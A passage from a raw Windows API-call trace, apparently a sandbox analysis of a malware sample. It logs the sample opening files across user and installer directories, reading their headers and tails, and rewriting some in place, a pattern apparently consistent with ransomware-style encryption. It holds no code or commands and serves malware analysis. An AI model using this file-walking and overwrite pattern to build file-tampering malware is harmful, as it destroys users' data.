lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0178.426] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0178.427] CloseHandle (hObject=0x204) returned 1 [0178.427] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0178.427] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.427] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e0 [0178.428] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.428] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.428] ReleaseMutex (hMutex=0x168) returned 1 [0178.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0178.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0178.428] ReadFile (in: hFile=0x204, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x345f2bc*=0x6e0, lpOverlapped=0x0) returned 1 [0178.429] CloseHandle (hObject=0x204) returned 1 [0178.429] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0178.429] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.429] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6c2 [0178.429] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.430] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.430] ReleaseMutex (hMutex=0x168) returned 1 [0178.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0178.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OIS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 18 [0178.430] ReadFile (in: hFile=0x204, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x6c2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x345f2bc*=0x6c2, lpOverlapped=0x0) returned 1 [0179.526] CloseHandle (hObject=0x204) returned 1 [0179.526] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.526] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.526] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e6 [0179.527] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.527] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.527] ReleaseMutex (hMutex=0x168) returned 1 [0179.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0179.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0179.527] ReadFile (in: hFile=0x204, lpBuffer=0x2663f68, nNumberOfBytesToRead=0x6e6, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesRead=0x345f2bc*=0x6e6, lpOverlapped=0x0) returned 1 [0179.527] CloseHandle (hObject=0x204) returned 1 [0179.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.527] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.527] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2764 [0179.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.528] ReleaseMutex (hMutex=0x168) returned 1 [0179.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0179.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nslist.hxl", lpUsedDefaultChar=0x0) returned 10 [0179.528] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1764 [0179.528] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.528] CloseHandle (hObject=0x204) returned 1 [0179.528] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.529] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x25588 [0179.529] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.529] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.529] ReleaseMutex (hMutex=0x168) returned 1 [0179.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0179.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fd5c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0179.529] ReadFile (in: hFile=0x204, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0179.529] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x24588 [0179.529] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.529] CloseHandle (hObject=0x204) returned 1 [0179.530] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x24588 [0179.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.530] ReleaseMutex (hMutex=0x168) returned 1 [0179.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0179.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0179.530] ReadFile (in: hFile=0x204, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0179.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x23588 [0179.531] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.531] CloseHandle (hObject=0x204) returned 1 [0179.531] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.531] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.531] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x25588 [0179.531] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.531] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.531] ReleaseMutex (hMutex=0x168) returned 1 [0179.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0179.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0179.532] ReadFile (in: hFile=0x204, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0179.532] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x24588 [0179.532] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.532] CloseHandle (hObject=0x204) returned 1 [0179.532] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.532] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.533] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbf3c0 [0179.533] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.533] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.533] ReleaseMutex (hMutex=0x168) returned 1 [0179.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x64.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x64.exe", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VC_redist.x64.exe", lpUsedDefaultChar=0x0) returned 17 [0179.533] ReadFile (in: hFile=0x204, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0179.533] ReadFile (in: hFile=0x204, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.534] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xbe3c0 [0179.534] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.534] CloseHandle (hObject=0x204) returned 1 [0179.534] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.535] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.535] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7000 [0179.535] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.535] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.535] ReleaseMutex (hMutex=0x168) returned 1 [0179.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Home~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0179.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Home~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft at Home~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0179.535] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.536] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6000 [0179.537] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.537] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6000 [0179.537] WriteFile (in: hFile=0x204, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.538] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0179.538] WriteFile (in: hFile=0x204, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0179.538] CloseHandle (hObject=0x204) returned 1 [0179.538] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.540] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.540] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8000 [0179.540] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.540] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.540] ReleaseMutex (hMutex=0x168) returned 1 [0179.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.dat", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0179.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.dat", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="index.dat", lpUsedDefaultChar=0x0) returned 9 [0179.540] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.542] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7000 [0179.542] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.542] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7000 [0179.543] WriteFile (in: hFile=0x204, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.543] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0179.543] WriteFile (in: hFile=0x204, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0179.543] CloseHandle (hObject=0x204) returned 1 [0179.544] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 